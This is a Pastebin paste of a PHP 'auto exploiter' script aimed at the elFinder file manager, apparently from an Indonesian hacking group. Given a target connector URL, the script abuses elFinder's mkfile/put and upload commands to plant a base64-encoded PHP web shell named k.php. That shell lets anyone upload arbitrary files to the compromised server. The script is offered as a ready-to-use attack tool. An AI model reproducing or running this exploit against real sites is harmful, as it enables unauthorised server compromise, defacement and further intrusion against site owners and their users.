Advertisement
Tu5b0l3d

Auto exploiter Elfinder

Feb 13th, 2016
3,622
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.39 KB | None | 0 0
  1. <?php
  2. // Tu5b0l3d - IndoXploit
  3. // Thx: Sohai, Tunisian Cyber
  4. // http://indoxploit.blogspot.co.id/2016/02/auto-exploiter-elfinder.html
  5.  
  6.  
  7. error_reporting(0);
  8. if($argv[1]==""){
  9.     echo "\nUsage: php xploit.php www.site.com/PATH/php/connector.php\n\n";
  10. }
  11. else{
  12. $target = $argv[1]; //http://site.com/sites/all/libraries/elfinder/connectors/php/connector.php
  13. $nama_doang = "k.php"; //ini cuma nama
  14.  
  15. $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  16.  
  17.  
  18. $decode_isi = base64_decode($isi_nama_doang);
  19. $encode = base64_encode($nama_doang);
  20.  
  21. $fp = fopen($nama_doang,"w");
  22. fputs($fp, $decode_isi);
  23.  
  24. function ngirim($url, $isi){
  25.  
  26.  
  27. $ch = curl_init ("$url");
  28. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  31. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  32. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  33. curl_setopt ($ch, CURLOPT_POST, 1);
  34. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  35. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  36. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  37. $data3 = curl_exec ($ch);
  38. return $data3;
  39.  
  40. }
  41. echo "\n# $target\n# Uploading 1...\n";
  42. $url_mkfile = "$target?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  43. $b = file_get_contents("$url_mkfile");
  44.  
  45.  $post1 = array(
  46.                     "cmd" => "put",
  47.                     "target" => "l1_$encode",
  48.                     "content" => "$decode_isi",
  49.                    
  50.                     );
  51.  $post2 = array(
  52.                    
  53.                     "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  54.                     "upload[]" => "@$nama_doang",
  55.                    
  56.                     );
  57.  
  58. $output_mkfile = ngirim("$target", $post1);
  59. if(preg_match("/$nama_doang/", $output_mkfile)){
  60.     echo "# Upload Success 1... => $nama_doang\n# Coba buka di ../../elfinder/files/...\n\n";
  61. }
  62. else{
  63.  
  64. echo "# Upload Failed 1 \n# Uploading 2..\n";
  65. $upload_ah = ngirim("$target?cmd=upload", $post2);
  66. if(preg_match("/$nama_doang/", $upload_ah)){
  67.     echo "# Upload Success 2 => $nama_doang\n# Coba buka di ../../elfinder/files/...\n\n";
  68. }
  69. else{
  70.     echo "# Upload Failed 2\n\n";
  71. }
  72.  
  73.  
  74. }
  75. }
  76.  
  77. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement